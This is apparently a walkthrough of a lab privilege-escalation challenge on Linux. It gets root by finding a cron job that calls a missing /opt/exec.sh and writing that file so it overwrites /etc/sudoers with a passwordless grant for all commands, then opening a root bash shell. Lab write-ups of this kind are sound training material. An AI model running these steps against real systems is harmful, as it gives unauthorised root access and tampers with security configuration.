The Challenge

A running Linux server is a complicated beast with dozens of things happening in the background. Admins might at times forget to clean up the system properly when they install/update/remove things. Most of the times, these scenarios can be debugged with error logs. For an attacker, these logs can be a treasure trove! It allows him to understand how everything is running in the server and what kind of errors are happening. Of course, these logs might sometimes be spread over the system in different formats based on the admin’s personal preferences.

Your mission is to get a root shell on the box!

Challenge Accepted

First things first, easy wins… sudo -l

student@attackdefense:~$ sudo -l
User student may run the following commands on attackdefense:
    (root) NOPASSWD: /etc/init.d/cron
    (root) NOPASSWD: /etc/init.d/postfix

Now we know what we can run as sudo, let’s start the services…

student@attackdefense:~$ sudo /etc/init.d/cron start
 * Starting periodic command scheduler cron                                                                                                                                                                                                        [ OK ]
student@attackdefense:~$ sudo /etc/init.d/cron reload
 * Reloading configuration files for periodic command scheduler cron                                                                                                                                                                               [ OK ]

Great, they are running but we don’t really know what we are looking for, so I go for another easy way to find out and only look for files newer than 5 mins ago…

student@attackdefense:/$ find /var -cmin -5 2>/dev/null
/var/spool/postfix/lib/x86_64-linux-gnu
/var/spool/postfix/lib/x86_64-linux-gnu/libnss_dns-2.27.so
/var/spool/postfix/lib/x86_64-linux-gnu/libnss_hesiod.so.2
/var/spool/postfix/lib/x86_64-linux-gnu/libresolv.so.2
/var/spool/postfix/lib/x86_64-linux-gnu/libgcc_s.so.1
/var/spool/postfix/lib/x86_64-linux-gnu/libnss_files.so.2
/var/spool/postfix/lib/x86_64-linux-gnu/libnss_nisplus-2.27.so
/var/spool/postfix/lib/x86_64-linux-gnu/libnss_files-2.27.so
/var/spool/postfix/lib/x86_64-linux-gnu/libresolv-2.27.so
/var/spool/postfix/lib/x86_64-linux-gnu/libnss_compat.so.2
/var/spool/postfix/lib/x86_64-linux-gnu/libnss_compat-2.27.so
/var/spool/postfix/lib/x86_64-linux-gnu/libnss_hesiod-2.27.so
/var/spool/postfix/lib/x86_64-linux-gnu/libnss_nis.so.2
/var/spool/postfix/lib/x86_64-linux-gnu/libnss_dns.so.2
/var/spool/postfix/lib/x86_64-linux-gnu/libnss_nisplus.so.2
/var/spool/postfix/lib/x86_64-linux-gnu/libnss_nis-2.27.so
/var/spool/postfix/incoming
/var/spool/postfix/maildrop
/var/spool/postfix/etc
/var/spool/postfix/etc/host.conf
/var/spool/postfix/etc/nsswitch.conf
/var/spool/postfix/etc/hosts
/var/spool/postfix/etc/services
/var/spool/postfix/etc/ssl/certs/ca-certificates.crt
/var/spool/postfix/etc/resolv.conf
/var/spool/postfix/usr/lib/zoneinfo
/var/spool/postfix/usr/lib/zoneinfo/localtime
/var/spool/postfix/active
/var/mail
/var/mail/root

Something should stand out since we started services as root… /var/mail/root, let’s check it out..

From root@c236e95ceed7  Thu Mar 28 16:42:01 2019
Return-Path: <root@c236e95ceed7>
X-Original-To: root
Delivered-To: root@c236e95ceed7
Received: by c236e95ceed7 (Postfix, from userid 0)
        id BB51C19873EB; Thu, 28 Mar 2019 16:42:01 +0000 (UTC)
From: root@c236e95ceed7 (Cron Daemon)
To: root@c236e95ceed7
Subject: Cron <root@attackdefense> /bin/sh /opt/exec.sh
MIME-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 8bit
X-Cron-Env: <SHELL=/bin/sh>
X-Cron-Env: <HOME=/root>
X-Cron-Env: <PATH=/usr/bin:/bin>
X-Cron-Env: <LOGNAME=root>
Message-Id: <20190328164201.BB51C19873EB@c236e95ceed7>
Date: Thu, 28 Mar 2019 16:42:01 +0000 (UTC)

/bin/sh: 0: Can't open /opt/exec.sh

student@attackdefense:/$ cat /opt/exec.sh
cat: /opt/exec.sh: No such file or directory

It does not exist, so why don’t we try and write the file.

student@attackdefense:/$ echo "echo 'student ALL=(ALL) NOPASSWD:ALL' > /etc/sudoers" > /opt/exec.sh

Wait for cron to run or restart and then check we can sudo all with no password…

student@attackdefense:/$ sudo -l
User student may run the following commands on attackdefense:
    (ALL) NOPASSWD: ALL

Awesome, it worked! Now we should all know the next bit by now…

student@attackdefense:/$ sudo /bin/bash
root@attackdefense:/# id
uid=0(root) gid=0(root) groups=0(root)

Awesome, see how just a few simple commands get you to root. I didn’t even enum first as I always check for low hanging fruit, sudo -l being the lowest in my opinion closely followed by SETUID.